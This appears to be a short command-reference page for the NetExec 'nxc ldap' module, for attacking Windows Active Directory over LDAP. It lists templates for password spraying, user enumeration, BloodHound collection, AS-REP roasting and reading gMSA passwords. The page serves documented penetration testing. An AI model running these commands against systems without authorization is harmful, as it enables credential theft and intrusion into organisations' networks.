nxc ldap

Pentest and exploit Windows Active Directory Domains via LDAP. More information: https://www.netexec.wiki/ldap-protocol.

nxc ldap {{192.168.178.2}} -u {{path/to/usernames.txt}} -p {{path/to/passwords.txt}}

nxc ldap {{192.168.178.2}} -u {{username}} -p {{password}} --active-users

nxc ldap {{192.168.178.2}} -u {{username}} -p {{password}} --bloodhound --collection {{All}}

nxc ldap {{192.168.178.2}} -u {{username}} -p '' --asreproast {{path/to/output.txt}}

nxc ldap {{192.168.178.2}} -u {{username}} -p {{password}} --gmsa